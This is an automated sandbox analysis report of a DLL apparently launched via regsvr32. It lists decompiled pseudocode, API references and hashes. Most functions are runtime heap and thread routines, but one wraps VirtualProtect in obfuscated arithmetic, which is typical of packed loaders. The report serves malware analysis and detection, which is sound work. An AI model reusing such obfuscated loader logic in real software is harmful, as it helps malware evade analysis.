C-Code - Quality: 93%

			E100350EA(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011BF0(0x1003a421, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E10035766(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E100373B5();
				_t44 = _t37;
				_push(0x10035062);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}

0x100350ef
0x100350f4
0x100350f7
0x100350fa
0x100350fd
0x10035107
0x1003510a
0x10035110
0x10035120
0x10035112
0x1003511b
0x1003511b
0x10035123
0x10035128
0x1003512a
0x1003512f
0x1003513a
0x10035143
0x1003514f
0x10035152
0x10035155
0x10035158
0x1003515b
0x1003515e
0x10035161
0x10035164
0x10035167
0x1003516d
0x10035170
0x10035177
0x1003517e
0x10035181
0x10035187
0x1003518a
0x10035190
0x10035193
0x10035196
0x1003519c
0x100351a2
0x100351a5
0x100351a9
0x100351b7
0x100351bf

APIs

__EH_prolog.LIBCMT ref: 100350EF

Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B

GetCurrentThread.KERNEL32 ref: 1003513D
GetCurrentThreadId.KERNEL32 ref: 10035146

Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prologThread$_strlen
String ID:
API String ID: 1650857145-0
Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10005090 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10005090() {
				int _t1;

				_t1 =  *0x1004d408; // 0x2d2ecf0
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004780()))(); // executed
				return 0;
			}

0x10005090
0x10005097
0x1000509a
0x1000509a
0x100050a0
0x100050a5
0x100050ae
0x100050b2

APIs

ExitProcess.KERNEL32 ref: 1000509A

Strings

DllRegisterServer, xrefs: 100050A0

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9

Uniqueness

Uniqueness Score: -1.00%

Function 1001382A Relevance: 3.1, APIs: 2, Instructions: 59
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x10041e40);
				E10012514(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1004f58c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E1001254F(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x10050a64 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x10050a50; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10013A38(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E1001437A();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100138D4();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10011C50(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10014676(_t31) != 0);
				goto L14;
			}

0x1001382a
0x1001382c
0x10013831
0x10013839
0x1001383d
0x10013842
0x10013844
0x10013844
0x10013845
0x10013845
0x10013847
0x1001384d
0x100138b4
0x100138b6
0x100138dd
0x100138dd
0x100138df
0x100138e4
0x00000000
0x00000000
0x00000000
0x100138b6
0x10013856
0x1001389f
0x100138a1
0x00000000
0x00000000
0x100138a3
0x100138ac
0x100138b2
0x00000000
0x100138b2
0x1001385b
0x1001385e
0x10013861
0x10013864
0x1001386a
0x00000000
0x00000000
0x1001386e
0x10013874
0x10013877
0x1001387e
0x10013881
0x10013885
0x1001388a
0x1001388f
0x00000000
0x00000000
0x10013897
0x1001389c
0x00000000
0x100138c0
0x100138c7
0x00000000

APIs

__lock.LIBCMT ref: 1001386E
RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap__lock
String ID:
API String ID: 4078605025-0
Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91

Uniqueness

Uniqueness Score: -1.00%

Function 100107C8 Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t9;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x10041d10);
				_t9 = E10012514(__ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x10050a64 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10013B9B(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10013BC6();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001081B();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x10050a60); // executed
						}
					}
				}
				return E1001254F(_t9);
			}

0x100107c8
0x100107ca
0x100107cf
0x100107d4
0x100107d9
0x100107e2
0x10010824
0x00000000
0x100107e4
0x100107e6
0x100107ec
0x100107f1
0x100107f7
0x100107fc
0x100107fe
0x100107ff
0x10010800
0x10010806
0x10010807
0x1001080b
0x10010814
0x10010816
0x10010825
0x10010825
0x1001082d
0x1001082d
0x10010814
0x100107e2
0x10010838

APIs

__lock.LIBCMT ref: 100107E6

Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60

RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterFreeHeapSection__lock
String ID:
API String ID: 3012239193-0
Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5

Uniqueness

Uniqueness Score: -1.00%

Function 1001070F Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x10041d00);
				E10012514(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x10050a64 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x10050a64 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x10050a50; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E1001437A();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E10010781();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E1001254F(_t9);
			}

0x1001070f
0x10010711
0x10010716
0x1001071b
0x10010725
0x10010755
0x10010757
0x10010759
0x10010759
0x10010761
0x10010766
0x10010766
0x10010772
0x10010727
0x10010727
0x1001072d
0x00000000
0x1001072f
0x10010731
0x10010737
0x1001073b
0x10010742
0x10010745
0x10010749
0x1001074e
0x10010753
0x00000000
0x00000000
0x10010753
0x1001072d
0x1001077d

APIs

__lock.LIBCMT ref: 10010731

Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60

RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95

Uniqueness

Uniqueness Score: -1.00%

Function 10013A83 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10013A83(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10050a60 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10013A69();
					 *0x10050a64 = _t8;
					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x10050a60);
						goto L4;
					}
				}
			}

0x10013a94
0x10013a9c
0x10013aa1
0x10013acd
0x10013acf
0x10013aa3
0x10013aa3
0x10013aab
0x10013ab0
0x10013ad3
0x10013ac1
0x10013ac7
0x00000000
0x10013ac7
0x10013ab0

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94

Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60

HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602

Uniqueness

Uniqueness Score: -1.00%

Function 10003310 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10003310() {
				long _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr _t91;
				signed int _t101;
				signed int _t116;
				signed int _t122;
				intOrPtr _t126;
				signed int _t127;
				signed int _t132;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t141;
				signed int _t150;
				signed int _t158;
				signed int _t165;
				signed int _t175;
				signed int _t186;
				signed int _t216;
				signed int _t223;
				signed int _t227;
				intOrPtr _t235;
				signed int _t238;
				void* _t239;

				_t80 =  *(_t239 + 0x18);
				_t126 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t239 + 8)) = _t126;
				if(_t126 != 0) {
					_t132 =  *(_t80 + 0xc);
					_t127 =  *0x1004b0dc; // 0x0
					_t5 = _t127 + 1; // 0x1
					_t101 =  *0x1004b0ec; // 0x0
					_t165 =  *0x1004b0e0; // 0x0
					_t7 = _t165 + 0x1000000; // 0x1000000
					_t83 =  *0x1004b0e4; // 0x0
					_t150 =  *0x1004b0d8; // 0x0
					 *(_t239 + 0x10) = _t132;
					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
						_t35 = _t83 * _t165 + 1; // 0x1
						 *(_t239 + 0x1c) = _t83 * _t165;
						_t135 =  *0x1004b0e8; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb edi, edi");
						_t216 =  *0x1004b0d8; // 0x0
						_t223 =  *0x1004b0d8; // 0x0
						asm("sbb esi, esi");
						_t158 =  *0x1004b0ec; // 0x0
						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
						_t175 =  *0x1004b0e0; // 0x0
						_t116 = _t158 * _t127;
						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
						}
						_t186 =  *0x1004b0e0; // 0x0
						_t227 = _t158 * 0x3fffffff;
						_t122 =  *0x1004b0d8; // 0x0
						_t74 = _t227 + 1; // 0x1
						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t87);
					} else {
						_t137 =  *((intOrPtr*)(_t239 + 0x28));
						_t235 =  *_t137;
						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
								L7:
								_t91 =  *((intOrPtr*)(_t239 + 0x24));
								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
							} else {
								_t141 =  *((intOrPtr*)(_t239 + 0x24));
								_t238 =  *(_t141 + 0x3c);
								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}

0x10003313
0x10003317
0x1000331c
0x10003320
0x1000332b
0x1000332e
0x10003334
0x1000333b
0x10003343
0x1000334a
0x10003353
0x10003364
0x10003370
0x10003374
0x100033ff
0x10003408
0x1000340c
0x10003433
0x10003447
0x1000344f
0x10003492
0x10003498
0x100034a6
0x100034ac
0x100034b0
0x100034be
0x100034e1
0x100034fc
0x100034fc
0x10003500
0x10003515
0x10003525
0x1000352b
0x10003559
0x10003563
0x1000356c
0x1000337a
0x1000337a
0x1000337e
0x10003383
0x10003387
0x1000338e
0x100033cd
0x100033cd
0x100033e7
0x10003390
0x10003390
0x10003394
0x1000339c
0x00000000
0x00000000
0x1000339c
0x1000338e
0x100033f9
0x100033f9
0x10003322
0x1000332a
0x1000332a

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4

Uniqueness

Uniqueness Score: -1.00%

Function 10037855 Relevance: 1.5, APIs: 1, Instructions: 39
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10037855(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011BF0(0x1003aa13, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x1004eff0; // 0x1004eff4
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E1003768D(0x1004eff4);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x1004eff0 = _t15; // executed
					}
					_t14 = E10037446(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x1004eff0; // 0x1004eff4
				_t23 = E10037552(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x1004eff0; // 0x1004eff4
					_t23 = _t12;
					E10037732(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}

0x1003785a
0x1003785f
0x10037861
0x10037867
0x10037869
0x10037871
0x10037878
0x1003787b
0x1003787f
0x10037884
0x10037888
0x1003788a
0x1003788a
0x10037890
0x10037895
0x10037895
0x10037899
0x100378a4
0x100378a8
0x100378aa
0x100378ad
0x100378b3
0x100378b8
0x100378b8
0x100378c4
0x100378cc

APIs

__EH_prolog.LIBCMT ref: 1003785A

Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocH_prolog
String ID:
API String ID: 3910492588-0
Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100045D0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}

0x100045e4
0x100045ea

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 100045E4

Memory Dump Source

